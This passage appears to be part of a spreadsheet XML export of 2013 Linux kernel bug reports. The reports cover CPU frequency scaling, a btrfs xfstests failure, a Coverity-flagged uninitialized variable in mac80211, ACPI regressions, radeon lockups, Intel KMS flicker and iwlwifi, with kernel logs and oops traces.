  </si>
  <si>
    <t>3.10rc7</t>
  </si>
  <si>
    <t>2013-06-28 01:13 UTC</t>
  </si>
  <si>
    <t>Nell Hardcastle</t>
  </si>
  <si>
    <t>2013-12-09 08:25 UTC</t>
  </si>
  <si>
    <t>Running 3.10-rc7 on an i5-4200U, with either intel_pstate or the older cpufreq drivers the CPU was stuck at 800MHz. I added the model, 0x45, to intel_pstate_cpu_ids and frequency scaling seems to be working as intended now.</t>
  </si>
  <si>
    <t>xfstests/generic/130 fails with single/single</t>
  </si>
  <si>
    <t>3.10+next</t>
  </si>
  <si>
    <t>2013-07-02 10:31 UTC</t>
  </si>
  <si>
    <t>generic/130 11s ... [12:27:08] [12:27:18] - output mismatch (see /root/xfstests/results/generic/130.out.bad) --- tests/generic/130.out 2013-05-29 17:16:02.000000000 +0200 +++ /root/xfstests/results/generic/130.out.bad 2013-07-02 12:27:18.000000000 +0200 @@ -4,8 +4,9 @@ XXX Bytes, X ops; XX:XX:XX.X (XXX YYY/sec and XXX ops/sec) wrote 65536/65536 bytes at offset 65536 XXX Bytes, X ops; XX:XX:XX.X (XXX YYY/sec and XXX ops/sec) -00000000: 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c............... -00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000000: 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 cccccccccccccccc +* +00001000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ * 00010000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA * ... (Run 'diff -u tests/generic/130.out /root/xfstests/results/generic/130.out.bad' to see the entire diff) MKFS_OPTIONS -- -m single -d single --mixed /dev/sda9 MOUNT_OPTIONS -- -o enospc_debug,space_cache,noatime,compress-force=lzo /dev/sda9 /mnt/a2 and MKFS_OPTIONS -- -m single -d single /dev/sda9 MOUNT_OPTIONS -- -o enospc_debug,space_cache,noatime,compress-force=lzo /dev/sda9 /mnt/a2 (same error output in --mixed and non-mixed mode) device layout: Label: none uuid: 2de8d606-f4a5-4032-8329-37cef686c13a Total devices 1 FS bytes used 3.31MB devid 1 size 10.00GB used 1.01GB path /dev/sda9 Label: none uuid: 3743469d-d436-44b9-b4bb-a43c3e9d3fcd Total devices 4 FS bytes used 661.74MB devid 4 size 10.00GB used 1.01GB path /dev/sda8 devid 3 size 10.00GB used 2.01GB path /dev/sda7 devid 2 size 10.00GB used 2.00GB path /dev/sda6 devid 1 size 10.00GB used 1.02GB path /dev/sda5</t>
  </si>
  <si>
    <t>mac80211/cfg.c: station info not initialized in ieee80211_get_et_stats</t>
  </si>
  <si>
    <t>3.10 it seems</t>
  </si>
  <si>
    <t>2013-07-05 05:35 UTC</t>
  </si>
  <si>
    <t>2013-11-13 16:31 UTC</t>
  </si>
  <si>
    <t>Coverity CID 1016544 shows: 579static void ieee80211_get_et_stats(struct wiphy *wiphy, 580 struct net_device *dev, 581 struct ethtool_stats *stats, 582 u64 *data) 583{ 584 struct ieee80211_sub_if_data *sdata = IEEE80211_DEV_TO_SUB_IF(dev); 585 struct ieee80211_chanctx_conf *chanctx_conf; 586 struct ieee80211_channel *channel; 587 struct sta_info *sta; 588 struct ieee80211_local *local = sdata-&gt;local; 1. var_decl: Declaring variable "sinfo" without initializer. 589 struct station_info sinfo; 590 struct survey_info survey; 591 int i, q; 592#define STA_STATS_SURVEY_LEN 7 593 594 memset(data, 0, sizeof(u64) * STA_STATS_LEN); 595 596#define ADD_STA_STATS(sta) \ 597 do { \ 598 data[i++] += sta-&gt;rx_packets; \ 599 data[i++] += sta-&gt;rx_bytes; \ 600 data[i++] += sta-&gt;wep_weak_iv_count; \ 601 data[i++] += sta-&gt;num_duplicates; \ 602 data[i++] += sta-&gt;rx_fragments; \ 603 data[i++] += sta-&gt;rx_dropped; \ 604 \ 605 data[i++] += sinfo.tx_packets; \ 606 data[i++] += sinfo.tx_bytes; \ 607 data[i++] += sta-&gt;tx_fragments; \ 608 data[i++] += sta-&gt;tx_filtered_count; \ 609 data[i++] += sta-&gt;tx_retry_failed; \ 610 data[i++] += sta-&gt;tx_retry_count; \ 611 data[i++] += sta-&gt;beacon_loss_count; \ 612 } while (0) 613 614 /* For Managed stations, find the single station based on BSSID 615 * and use that. For interface types, iterate through all available 616 * stations and add stats for any station that is assigned to this 617 * network device. 618 */ 619 620 mutex_lock(&amp;local-&gt;sta_mtx); 621 2. Condition "sdata-&gt;vif.type == NL80211_IFTYPE_STATION", taking false branch 622 if (sdata-&gt;vif.type == NL80211_IFTYPE_STATION) { 623 sta = sta_info_get_bss(sdata, sdata-&gt;u.mgd.bssid); 624 625 if (!(sta &amp;&amp; !WARN_ON(sta-&gt;sdata-&gt;dev != dev))) 626 goto do_survey; 627 628 sinfo.filled = 0; 629 sta_set_sinfo(sta, &amp;sinfo); 630 631 i = 0; 632 ADD_STA_STATS(sta); 633 634 data[i++] = sta-&gt;sta_state; 635 636 637 if (sinfo.filled &amp; STATION_INFO_TX_BITRATE) 638 data[i] = 100000 * 639 cfg80211_calculate_bitrate(&amp;sinfo.txrate); 640 i++; 641 if (sinfo.filled &amp; STATION_INFO_RX_BITRATE) 642 data[i] = 100000 * 643 cfg80211_calculate_bitrate(&amp;sinfo.rxrate); 644 i++; 645 646 if (sinfo.filled &amp; STATION_INFO_SIGNAL_AVG) 647 data[i] = (u8)sinfo.signal_avg; 648 i++; 649 } else { 3. Condition "&amp;sta-&gt;list != &amp;local-&gt;sta_list", taking true branch 6. Condition "&amp;sta-&gt;list != &amp;local-&gt;sta_list", taking true branch 9. Condition "&amp;sta-&gt;list != &amp;local-&gt;sta_list", taking true branch 650 list_for_each_entry(sta, &amp;local-&gt;sta_list, list) { 651 /* Make sure this station belongs to the proper dev */ 4. Condition "sta-&gt;sdata-&gt;dev != dev", taking true branch 7. Condition "sta-&gt;sdata-&gt;dev != dev", taking true branch 10. Condition "sta-&gt;sdata-&gt;dev != dev", taking false branch 652 if (sta-&gt;sdata-&gt;dev != dev) 5. Continuing loop 8. Continuing loop 653 continue; 654 655 i = 0; CID 1016544 (2) (#1-2 of 2): Uninitialized scalar variable (UNINIT) [select issue] 11. uninit_use: Using uninitialized value "sinfo.tx_packets". 656 ADD_STA_STATS(sta); /net/mac80211/cfg.c 596#define ADD_STA_STATS(sta) \ 597 do { \ 598 data[i++] += sta-&gt;rx_packets; \ 599 data[i++] += sta-&gt;rx_bytes; \ 600 data[i++] += sta-&gt;wep_weak_iv_count; \ 601 data[i++] += sta-&gt;num_duplicates; \ 602 data[i++] += sta-&gt;rx_fragments; \ 603 data[i++] += sta-&gt;rx_dropped; \ 604 \ 605 data[i++] += sinfo.tx_packets; \ 606 data[i++] += sinfo.tx_bytes; \ 607 data[i++] += sta-&gt;tx_fragments; \ 608 data[i++] += sta-&gt;tx_filtered_count; \ 609 data[i++] += sta-&gt;tx_retry_failed; \ 610 data[i++] += sta-&gt;tx_retry_count; \ 611 data[i++] += sta-&gt;beacon_loss_count; \ 612 } while (0) 657 } 658 } Fix could perhaps be just: --- a/net/mac80211/cfg.c +++ b/net/mac80211/cfg.c @@ -592,6 +592,7 @@ static void ieee80211_get_et_stats(struct wiphy *wiphy, #define STA_STATS_SURVEY_LEN 7 memset(data, 0, sizeof(u64) * STA_STATS_LEN); + memset(&amp;sinfo, 0, sizeof(sinfo)); #define ADD_STA_STATS(sta) \ do { \</t>
  </si>
  <si>
    <t>Wrong battery information reported on Samsung NP540U3C</t>
  </si>
  <si>
    <t>2.6.34 and newer</t>
  </si>
  <si>
    <t>2013-07-05 14:01 UTC</t>
  </si>
  <si>
    <t>Jan Hoffmann</t>
  </si>
  <si>
    <t>2013-10-09 09:07 UTC</t>
  </si>
  <si>
    <t>Created attachment 106809 [details] Output of acpidump The battery information reported in sysfs is wrong since kernel 2.6.34. In older versions the information is correct. The affected device is a Samsung NP540U3C. The output of acpidump is attached. These are the contents of /sys/class/power_supply/BAT1/uevent: Correct information on 2.6.33: POWER_SUPPLY_NAME=BAT1 POWER_SUPPLY_TYPE=Battery POWER_SUPPLY_STATUS=Full POWER_SUPPLY_PRESENT=1 POWER_SUPPLY_TECHNOLOGY=Li-ion POWER_SUPPLY_VOLTAGE_MIN_DESIGN=7500000 POWER_SUPPLY_VOLTAGE_NOW=8638000 POWER_SUPPLY_CURRENT_NOW=0 POWER_SUPPLY_CHARGE_FULL_DESIGN=6890000 POWER_SUPPLY_CHARGE_FULL=6800000 POWER_SUPPLY_CHARGE_NOW=6800000 POWER_SUPPLY_MODEL_NAME= POWER_SUPPLY_MANUFACTURER=SAMSUNG Electronics POWER_SUPPLY_SERIAL_NUMBER= Wrong information on 2.6.34: POWER_SUPPLY_NAME=BAT1 POWER_SUPPLY_TYPE=Battery POWER_SUPPLY_STATUS=Unknown POWER_SUPPLY_PRESENT=1 POWER_SUPPLY_TECHNOLOGY=Unknown POWER_SUPPLY_CYCLE_COUNT=204 POWER_SUPPLY_VOLTAGE_MIN_DESIGN=1000 POWER_SUPPLY_VOLTAGE_NOW=8638000 POWER_SUPPLY_CURRENT_NOW=0 POWER_SUPPLY_POWER_NOW=0 POWER_SUPPLY_ENERGY_FULL_DESIGN=1000 POWER_SUPPLY_ENERGY_FULL=6890000 POWER_SUPPLY_ENERGY_NOW=6800000 POWER_SUPPLY_MODEL_NAME= POWER_SUPPLY_MANUFACTURER=LION POWER_SUPPLY_SERIAL_NUMBER=</t>
  </si>
  <si>
    <t>Lock up using 3.10.0 + dpm patches</t>
  </si>
  <si>
    <t>3.10.0</t>
  </si>
  <si>
    <t>2013-07-13 19:58 UTC</t>
  </si>
  <si>
    <t>Bernd Steinhauser</t>
  </si>
  <si>
    <t>2013-11-13 19:24 UTC</t>
  </si>
  <si>
    <t>I build a kernel based on 3.10.0 for which I merged the dpm patches from Alex Deuchers up to: commit 9b5de59629d2e58eab41e2f0e5cc60b3c395f1c3 Author: Alex Deucher &lt;alexander.deucher@amd.com&gt; Date: Tue Jul 2 18:52:10 2013 -0400 drm/radeon/dpm: implement force performance level for TN Allows you to force the selected performance level via sysfs. Signed-off-by: Alex Deucher &lt;alexander.deucher@amd.com&gt; Not sure about the follow up commits, could try with the lates rev, but they seem to apply mostly to ids later than r600. Hardware: 01:05.0 VGA compatible controller [0300]: Advanced Micro Devices, Inc. [AMD/ATI] RS880 [Radeon HD 4290] [1002:9714] Kernel starts and dpm seems to work (although I can't fully check since the debugfs support for r600 is still missing). At some (almost random) point of time, the display freezes (while the rest of the computer works just fine). Until now it always happened during drag&amp;drop (or in that case only "drag". ;-)) but I did not find a reliable way to reproduce it. In my log find these messages: 2013-07-12T16:53:55.681371+02:00 orionis kernel: [121491.842729] 2013-07-12T16:53:55.681406+02:00 orionis kernel: [121491.842743] ================================================ 2013-07-12T16:53:55.681409+02:00 orionis kernel: [121491.842749] [ BUG: lock held when returning to user space! ] 2013-07-12T16:53:55.681412+02:00 orionis kernel: [121491.842759] 3.10.0-00731-ga08e3f1 #1 Not tainted 2013-07-12T16:53:55.681414+02:00 orionis kernel: [121491.842765] ------------------------------------------------ 2013-07-12T16:53:55.681417+02:00 orionis kernel: [121491.842771] X/1472 is leaving the kernel with locks still held! 2013-07-12T16:53:55.681458+02:00 orionis kernel: [121491.842779] 2 locks held by X/1472: 2013-07-12T16:53:55.681462+02:00 orionis kernel: [121491.842783] #0: (reservation_ww_class_acquire){......}, at: [&lt;ffffffff81325d1d&gt;] radeon_bo_list_validate+0x1c/0xc1 2013-07-12T16:53:55.681465+02:00 orionis kernel: [121491.842810] #1: (reservation_ww_class_mutex){......}, at: [&lt;ffffffff8130d526&gt;] ttm_eu_reserve_buffers+0x113/0x401 When I try to switch to the console via SysRq+V, I get a blank screen with a (not blinking) dash in the upper left, but still not a working console. I found this in my log 3 times: 2013-07-12T16:54:28.673494+02:00 orionis kernel: [121524.876529] SysRq : Restore framebuffer console 2013-07-12T16:54:28.673533+02:00 orionis kernel: [121524.876690] ------------[ cut here ]------------ 2013-07-12T16:54:28.673549+02:00 orionis kernel: [121524.876719] WARNING: at drivers/gpu/drm/drm_crtc.c:87 drm_warn_on_modeset_not_all_locked+0x43/0x7a() 2013-07-12T16:54:28.673616+02:00 orionis kernel: [121524.876733] Modules linked in: xts snd_hda_codec_via snd_hda_intel snd_hda_codec k10temp snd_pcm r8169 mii snd_page_alloc snd_timer snd i2c_piix4 soundcore ipt_MASQUERADE iptable_nat nf_nat_ipv4 nf_nat w83627ehf 2013-07-12T16:54:28.673620+02:00 orionis kernel: [121524.876796] CPU: 3 PID: 22105 Comm: kworker/3:2 Not tainted 3.10.0-00731-ga08e3f1 #1 2013-07-12T16:54:28.673623+02:00 orionis kernel: [121524.876804] Hardware name: To Be Filled By O.E.M. To Be Filled By O.E.M./890GX Extreme3, BIOS L1.19 03/30/2010 2013-07-12T16:54:28.673632+02:00 orionis kernel: [121524.876816] Workqueue: events drm_fb_helper_restore_work_fn 2013-07-12T16:54:28.673645+02:00 orionis kernel: [121524.876838] ffffffff81807e8b ffff8801e6b01c38 ffffffff815580cd ffff8801e6b01c78 2013-07-12T16:54:28.674039+02:00 orionis kernel: [121524.876863] ffffffff8103781f ffff8801e6b01c88 0000000000000000 ffff8802164ed000 2013-07-12T16:54:28.674044+02:00 orionis kernel: [121524.876882] ffff8802164ec000 ffff8802164ec9e8 ffff880215b90c00 ffff8801e6b01c88 2013-07-12T16:54:28.674047+02:00 orionis kernel: [121524.876894] Call Trace: 2013-07-12T16:54:28.674049+02:00 orionis kernel: [121524.876910] [&lt;ffffffff815580cd&gt;] dump_stack+0x19/0x1b 2013-07-12T16:54:28.674052+02:00 orionis kernel: [121524.876922] [&lt;ffffffff8103781f&gt;] warn_slowpath_common+0x62/0x7b 2013-07-12T16:54:28.674054+02:00 orionis kernel: [121524.876932] [&lt;ffffffff8103784d&gt;] warn_slowpath_null+0x15/0x17 2013-07-12T16:54:28.674057+02:00 orionis kernel: [121524.876943] [&lt;ffffffff812fc0d2&gt;] drm_warn_on_modeset_not_all_locked+0x43/0x7a 2013-07-12T16:54:28.674059+02:00 orionis kernel: [121524.876954] [&lt;ffffffff812eb1b8&gt;] drm_fb_helper_restore_fbdev_mode+0x1d/0xab 2013-07-12T16:54:28.674061+02:00 orionis kernel: [121524.876964] [&lt;ffffffff812eb285&gt;] drm_fb_helper_force_kernel_mode+0x3f/0x73 2013-07-12T16:54:28.674064+02:00 orionis kernel: [121524.876975] [&lt;ffffffff812ec491&gt;] drm_fb_helper_restore_work_fn+0x9/0x24 2013-07-12T16:54:28.674066+02:00 orionis kernel: [121524.876987] [&lt;ffffffff8104dd1f&gt;] process_one_work+0x227/0x3a7 2013-07-12T16:54:28.674069+02:00 orionis kernel: [121524.876997] [&lt;ffffffff8104dcba&gt;] ? process_one_work+0x1c2/0x3a7 2013-07-12T16:54:28.674071+02:00 orionis kernel: [121524.877010] [&lt;ffffffff8104e61f&gt;] worker_thread+0x1d1/0x2cc 2013-07-12T16:54:28.674073+02:00 orionis kernel: [121524.877022] [&lt;ffffffff8104e44e&gt;] ? manage_workers.isra.28+0x1c6/0x1c6 2013-07-12T16:54:28.674076+02:00 orionis kernel: [121524.877032] [&lt;ffffffff8105334f&gt;] kthread+0xd0/0xd8 2013-07-12T16:54:28.674078+02:00 orionis kernel: [121524.877045] [&lt;ffffffff8105327f&gt;] ? __init_kthread_worker+0x55/0x55 2013-07-12T16:54:28.674080+02:00 orionis kernel: [121524.877057] [&lt;ffffffff8155f7ac&gt;] ret_from_fork+0x7c/0xb0 2013-07-12T16:54:28.674083+02:00 orionis kernel: [121524.877073] [&lt;ffffffff8105327f&gt;] ? __init_kthread_worker+0x55/0x55 2013-07-12T16:54:28.674085+02:00 orionis kernel: [121524.877081] ---[ end trace 2d4e7f44058d01cf ]--- 2013-07-12T16:54:28.674087+02:00 orionis kernel: [121524.877086] ------------[ cut here ]------------ When I use SAK (SysRq+k), the x process is killed and hence the system gets into a usable state again. I tried 1-2 days with plain 3.10.0 and didn't see this issue, so it might be a regression of the dpm patches, but I'm not 100% sure about that.</t>
  </si>
  <si>
    <t>Notebook P15SM: Regression of "ACPI: Rework acpi_get_child() to be more efficient"</t>
  </si>
  <si>
    <t>3.8.5, all versions with 33f767d7</t>
  </si>
  <si>
    <t>2013-07-16 12:40 UTC</t>
  </si>
  <si>
    <t>2013-08-10 09:14 UTC</t>
  </si>
  <si>
    <t>Created attachment 106894 [details] acpidump for Notebook P15SM Bug https://bugzilla.kernel.org/show_bug.cgi?id=42696 fixes incorrect enumeration of an ACPI handle for a PCI device: commit 33f767d767e9a684e9cd60704d4c049a2014c8d5 Author: Rafael J. Wysocki &lt;rafael.j.wysocki@intel.com&gt; Date: Thu Jan 10 13:13:49 2013 +0100 ACPI: Rework acpi_get_child() to be more efficient This resulted in breakage on another machine as reported here[1]. The video card can again not be found. This seems to be caused by a Device which does not have anything useful as shown in [2]. When the above commit is reverted (on top of 3.9.9 and 3.10.0), the bug is gone for these users. Details from DMI: system-manufacturer : Notebook system-product-name : P15SM system-version : Not Applicable baseboard-manufacturer: Notebook baseboard-product-name: P15SM baseboard-version : Not Applicable bios-vendor : American Megatrends Inc. bios-version : 4.6.5 bios-release-date : 04/09/2013 For some debugging attempts, see [1]. The bug occurs because the wrong ACPI handle is attached to the PCIe Root Port. The correct handle is \_SB.PCI0.PEG0 (which has a child PEGP video device), but after the above commit it becomes \_SB.PCI0.P0P2 (which has no children). I thought that the commit in 3.11 that tests _STA would solve this issue (as the P0P2 device does not have such a method), but the results were negative. The commit they tried to apply (without revert) was: commit c7d9ca90aa9497f0b6e301ec67c52dd4b57a7852 Author: Jeff Wu &lt;zlinuxkernel@gmail.com&gt; Date: Wed May 29 06:31:30 2013 +0000 ACPI: add _STA evaluation at do_acpi_find_child() [1]: https://github.com/Bumblebee-Project/bbswitch/issues/65 [2]: https://github.com/Bumblebee-Project/bbswitch/issues/65#issuecomment-20824596</t>
  </si>
  <si>
    <t>Outputs still alive and scanning out as their backing memory is overwritten during KMS takeover</t>
  </si>
  <si>
    <t>2013-07-18 01:01 UTC</t>
  </si>
  <si>
    <t>KernelBug</t>
  </si>
  <si>
    <t>2014-03-31 07:52 UTC</t>
  </si>
  <si>
    <t>Created attachment 106915 [details] config-3.9.9 Hi, I'm running Slackware 14.0 and I noticed under both x86 &amp; x64, that on around 8 different laptops from various makers, right when I was looking for a new laptop to buy and trying them out, every one of them using an Intel HD 4000 chip had this problem with the 3.9x kernels, and I"ve also noticed with my latest laptop the same problem under 3.10x With 3.2x and 3.4x kernels I never saw this problem and I don't recall seeing it under 3.8x, but the problem might of begun there, not sure... When the computers first boot the console for one second is 640x480 size, then it goes blank for a brief second, then the KMS kicks in. Right at the point it kicks in and starts to go into KMS, just for a brief second across about 1/4 of the screen at the top going all the way from left to right there's a flicker of the screen, typically in a hue of colors, it doesn't look good and it makes me feel like this could possibly cause screen damage over long periods of time, not sure... Again, I do know for a fact this never happend in the 3.2x &amp; 3.4x kernels, and it might of started at 3.8x, but it's certainly in all of the 3.9x and 3.10x kernels... I truly hope something can be done to fix this... I'm attaching the config files from the latest 3.9.9 and 3.10.1 THANKS</t>
  </si>
  <si>
    <t>WiFi doen't work on Intel WiMAX/WiFi Link 5150</t>
  </si>
  <si>
    <t>3.9.9-1</t>
  </si>
  <si>
    <t>2013-07-18 13:18 UTC</t>
  </si>
  <si>
    <t>Arthur Sudneko</t>
  </si>
  <si>
    <t>Created attachment 106926 [details] lspci -vv I have notebook Dell 11z with WiMAX/WiFi adapter Intel Link 5150. When I tried to list network interfaces, i didn't see any WiFi interfaces. &gt;ifconfig enp0s29f7u5: flags=129&lt;UP,NOARP&gt; mtu 1400 ether 00:1d:e1:1b:40:a2 txqueuelen 20 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 enp2s0: flags=4099&lt;UP,BROADCAST,MULTICAST&gt; mtu 1500 ether 00:26:b9:c8:83:86 txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73&lt;UP,LOOPBACK,RUNNING&gt; mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10&lt;host&gt; loop txqueuelen 0 (Local Loopback) RX packets 212 bytes 18372 (17.9 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 212 bytes 18372 (17.9 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 BTW: enp2s0 - ethernet, enp0s29f7u5 - WiMax Module for my WiFi adapter named iwlwifi. &gt; lsmod | grep iwlwifi iwlwifi 173477 0 cfg 510937 1 iwlwifi But, when i tried to list pci devices (lspci -vv), i didn't see string "driver in use: iwlwifi" string in this: 08:00.0 Network controller: Intel Corporation WiMAX/WiFi Link 5150 Subsystem: Intel Corporation Device 1326 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 11 Region 0: Memory at f0600000 (64-bit, non-prefetchable) [size=8K] Capabilities: &lt;access denied&gt; (the full "lspci -vv" in the attachment)</t>
  </si>
  <si>
    <t>Kernel oops at boot in acpi_ev_notify_dispatch</t>
  </si>
  <si>
    <t>3.5.4 and 3.10.1</t>
  </si>
  <si>
    <t>2013-07-19 12:45 UTC</t>
  </si>
  <si>
    <t>ronald.vink</t>
  </si>
  <si>
    <t>2014-06-11 00:15 UTC</t>
  </si>
  <si>
    <t>Created attachment 106942 [details] Output of acpidump, hwinfo lspci syslog Sometimes the kernel oops at boot, something to do with acpi. It started when I installed 3.5.4 on a Panasonic CF-19 Toughbook. I tried 3.10.1 but the same result. Crash occurs in same function but different adress. (drivers/acpi/acpica/evmisc.c line 267 for 3.5.4 and line 216 for 3.1.0.1) syslog reports : Jul 5 10:44:36 ship1 kernel: BUG: unable to handle kernel NULL pointer dereference at (null) Jul 5 10:44:36 ship1 kernel: IP: [&lt; (null)&gt;] (null) Jul 5 10:44:36 ship1 kernel: *pde = 00000000 Jul 5 10:44:36 ship1 kernel: Oops: 0010 [#1] SMP Jul 5 10:44:36 ship1 kernel: Modules linked in: af_packet uinput nfsd exportfs nfs lockd nfs_acl sunrpc ipv6 iptable_filter iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack nf_defrag_ipv4 iptable_mangle iptable_raw ip_tables x_tables binfmt_misc loop cpufreq_ondemand cpufreq_conservative cpufreq_powersave speedstep_lib acpi_cpufreq arc4 freq_table iwlwifi mac80211 led_class mperf cfg80211 video intel_agp thermal processor rfkill i2c_i801 xhci_hcd intel_gtt thermal_sys agpgart kvm_intel kvm e1000e microcode sg coretemp rtc_cmos i2c_core serio_raw evdev hwmon battery ac button ext3 jbd pata_jmicron ide_pci_generic ahci libahci ata_piix libata sd_mod scsi_mod uhci_hcd ohci_hcd ehci_hcd usbhid usbcore usb_common [last unloaded: scsi_wait_scan] Jul 5 10:44:36 ship1 kernel: Jul 5 10:44:36 ship1 kernel: Pid: 1009, comm: kworker/0:2 Not tainted 3.5.4-vessel #6 Panasonic Corporation CF-191HAAXF4/CF19-6 Jul 5 10:44:36 ship1 kernel: EIP: 0060:[&lt;00000000&gt;] EFLAGS: 00010282 CPU: 0 Jul 5 10:44:36 ship1 kernel: EIP is at 0x0 Jul 5 10:44:36 ship1 kernel: EAX: f584d4a0 EBX: f5aad938 ECX: 00000000 EDX: 00000080 Jul 5 10:44:36 ship1 kernel: ESI: f5b575a8 EDI: f5e61740 EBP: dfa99f2c ESP: dfa99f20 Jul 5 10:44:36 ship1 kernel: DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 Jul 5 10:44:36 ship1 kernel: CR0: 8005003b CR2: 00000000 CR3: 1fb83000 CR4: 001407d0 Jul 5 10:44:36 ship1 kernel: DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 Jul 5 10:44:36 ship1 kernel: DR6: ffff0ff0 DR7: 00000400 Jul 5 10:44:36 ship1 kernel: Process kworker/0:2 (pid: 1009, ti=dfa98000 task=f5aed790 task.ti=dfa98000) Jul 5 10:44:36 ship1 kernel: Stack: Jul 5 10:44:36 ship1 kernel: c02a1a99 f4ebd3a0 f4ebd3a8 dfa99f3c c0294cc7 f4ebd3a8 f59f6a80 dfa99f78 Jul 5 10:44:36 ship1 kernel: c013e4fb 00000000 c051b000 c0520920 f5aed790 f5ad3500 00000046 c0294caa Jul 5 10:44:36 ship1 kernel: 00000000 f5e65a05 f5e65a00 f59f6a80 f5e61740 35944000 dfa99fb8 c013ea70 Jul 5 10:44:36 ship1 kernel: Call Trace: Jul 5 10:44:36 ship1 kernel: [&lt;c02a1a99&gt;] ? acpi_ev_notify_dispatch+0x4e/0x61 Jul 5 10:44:36 ship1 kernel: [&lt;c0294cc7&gt;] acpi_os_execute_deferred+0x1d/0x28 Jul 5 10:44:36 ship1 kernel: [&lt;c013e4fb&gt;] process_one_work+0xfb/0x340 Jul 5 10:44:36 ship1 kernel: [&lt;c0294caa&gt;] ? acpi_os_wait_events_complete+0x19/0x19 Jul 5 10:44:36 ship1 kernel: [&lt;c013ea70&gt;] worker_thread+0x140/0x3a0 Jul 5 10:44:36 ship1 kernel: [&lt;c013e930&gt;] ? manage_workers+0x1f0/0x1f0 Jul 5 10:44:36 ship1 kernel: [&lt;c0144354&gt;] kthread+0x74/0x80 Jul 5 10:44:36 ship1 kernel: [&lt;c01442e0&gt;] ? kthread_freezable_should_stop+0x60/0x60 Jul 5 10:44:36 ship1 kernel: [&lt;c03d11b6&gt;] kernel_thread_helper+0x6/0xd Jul 5 10:44:36 ship1 kernel: Code: Bad EIP value. Jul 5 10:44:36 ship1 kernel: EIP: [&lt;00000000&gt;] 0x0 SS:ESP 0068:dfa99f20 Jul 5 10:44:36 ship1 kernel: CR2: 0000000000000000 Jul 5 10:44:36 ship1 kernel: ---[ end trace 11fc5ca1174c2a77 ]--- Jul 5 10:44:38 ship1 kernel: BUG: unable to handle kernel paging request at fffffffc Jul 5 10:44:38 ship1 kernel: IP: [&lt;c0143f3a&gt;] kthread_data+0xa/0x10 Jul 5 10:44:38 ship1 kernel: *pde = 00528067 *pte = 00000000 Jul 5 10:44:38 ship1 kernel: Oops: 0000 [#2] SMP Jul 5 10:44:38 ship1 kernel: Modules linked in: af_packet uinput nfsd exportfs nfs lockd nfs_acl sunrpc ipv6 iptable_filter iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack nf_defrag_ipv4 iptable_mangle iptable_raw ip_tables x_tables binfmt_misc loop cpufreq_ondemand cpufreq_conservative cpufreq_powersave speedstep_lib acpi_cpufreq arc4 freq_table iwlwifi mac80211 led_class mperf cfg80211 video intel_agp thermal processor rfkill i2c_i801 xhci_hcd intel_gtt thermal_sys agpgart kvm_intel kvm e1000e microcode sg coretemp rtc_cmos i2c_core serio_raw evdev hwmon battery ac button ext3 jbd pata_jmicron ide_pci_generic ahci libahci ata_piix libata sd_mod scsi_mod uhci_hcd ohci_hcd ehci_hcd usbhid usbcore usb_common [last unloaded: scsi_wait_scan] Jul 5 10:44:38 ship1 kernel: Jul 5 10:44:38 ship1 kernel: Pid: 1009, comm: kworker/0:2 Tainted: G D 3.5.4-vessel #6 Panasonic Corporation CF-191HAAXF4/CF19-6 Jul 5 10:44:38 ship1 kernel: EIP: 0060:[&lt;c0143f3a&gt;] EFLAGS: 00010002 CPU: 0 Jul 5 10:44:38 ship1 kernel: EIP is at kthread_data+0xa/0x10 Jul 5 10:44:38 ship1 kernel: EAX: 00000000 EBX: 00000000 ECX: 00000000 EDX: 00000000 Jul 5 10:44:38 ship1 kernel: ESI: f5e64920 EDI: 00000000 EBP: dfa99cf0 ESP: dfa99ce4 Jul 5 10:44:38 ship1 kernel: DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 Jul 5 10:44:38 ship1 kernel: CR0: 8005003b CR2: fffffffc CR3: 1fb83000 CR4: 001407d0 Jul 5 10:44:38 ship1 kernel: DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 Jul 5 10:44:38 ship1 kernel: DR6: ffff0ff0 DR7: 00000400 Jul 5 10:44:38 ship1 kernel: Process kworker/0:2 (pid: 1009, ti=dfa98000 task=f5aed790 task.ti=dfa98000) Jul 5 10:44:38 ship1 kernel: Stack: Jul 5 10:44:38 ship1 kernel: c0140d4c f5aed790 f5e64920 dfa99d8c c03cf26c f5402698 00000000 dfa99d14 Jul 5 10:44:38 ship1 kernel: c01d1c70 dfa99d43 f5827990 00000000 dfa99d34 c020ca60 dfa99d43 00000004 Jul 5 10:44:38 ship1 kernel: c051b000 c0520920 f5aed790 f581a000 000003f1 dfa99d44 c017e397 00000000 Jul 5 10:44:38 ship1 kernel: Call Trace: Jul 5 10:44:38 ship1 kernel: [&lt;c0140d4c&gt;] ? wq_worker_sleeping+0xc/0x80 Jul 5 10:44:38 ship1 kernel: [&lt;c03cf26c&gt;] __schedule+0x34c/0x750 Jul 5 10:44:38 ship1 kernel: [&lt;c01d1c70&gt;] ? d_hash_and_lookup+0x30/0x60 Jul 5 10:44:38 ship1 kernel: [&lt;c020ca60&gt;] ? proc_flush_task+0xd0/0x1a0 Jul 5 